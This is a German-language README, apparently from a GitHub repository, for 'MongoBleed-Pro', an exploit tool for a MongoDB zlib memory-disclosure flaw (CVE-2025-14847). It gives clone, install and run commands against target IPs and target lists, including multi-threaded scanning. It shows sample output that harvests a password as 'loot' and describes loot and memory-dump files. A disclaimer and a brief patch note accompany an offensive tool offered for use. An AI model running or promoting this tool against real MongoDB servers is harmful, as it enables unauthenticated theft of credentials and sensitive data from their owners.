
Exploit-Tool für CVE-2025-14847, eine MongoDB-Speicher-Offenlegungsschwachstelle, die eine mehrthreadige Extraktion sensibler Daten und Geheimnisse aus verwundbaren Instanzen ermöglicht.
Fortgeschrittenes MongoDB Memory-Leak-Exploit-Tool
Lerne weiter | Hacke weiter mit Alexcyberx
MongoBleed-Pro ist ein fortgeschrittenes Exploitation-Tool für CVE-2025-14847, eine kritische Speicher-Offenlegungs-Schwachstelle in der zlib-Komprimierungsverarbeitung von MongoDB. Dieses Tool ermöglicht es Sicherheitsforschern, sensible Daten aus verwundbaren MongoDB-Instanzen zu extrahieren.
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie immer die entsprechende Genehmigung ein, bevor Sie Tests durchführen.
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| File | Beschreibung |
|---|---|
loot_<host>.txt | Extrahierte Geheimnisse in lesbarem Format |
dump_<host>.bin | Roher Speicherauszug zur manuellen Analyse |
Wenn Sie ein MongoDB-Administrator sind, aktualisieren Sie auf die gepatchten Versionen:
alexcyberx
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE Datei für Details.
Wenn Sie dieses Tool nützlich fanden, geben Sie ihm bitte einen ⭐ auf GitHub!
「 Lerne weiter | Hacke weiter 」
Gemacht mit ❤️ von alexcyberx
| Property | Details |
|---|
| CVE ID | CVE-2025-14847 |
| Vulnerability Type | Speicher-Offenlegung |
| Affected Versions | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Root Cause | Buffer-Over-Read in der zlib-Dekomprimierung |
| Impact | Unausthentifizierter entfernter Speicherleck |
| Argument | Beschreibung | Standard |
|---|
--target | Ziel-IP/URL | Interaktive Eingabeaufforderung |
--file | Datei mit Zielliste | Keine |
--threads | Anzahl der Threads | 50 |
--min-offset | Minimaler Speicher-Offset | 20 |
--max-offset | Maximaler Speicher-Offset | 8192 |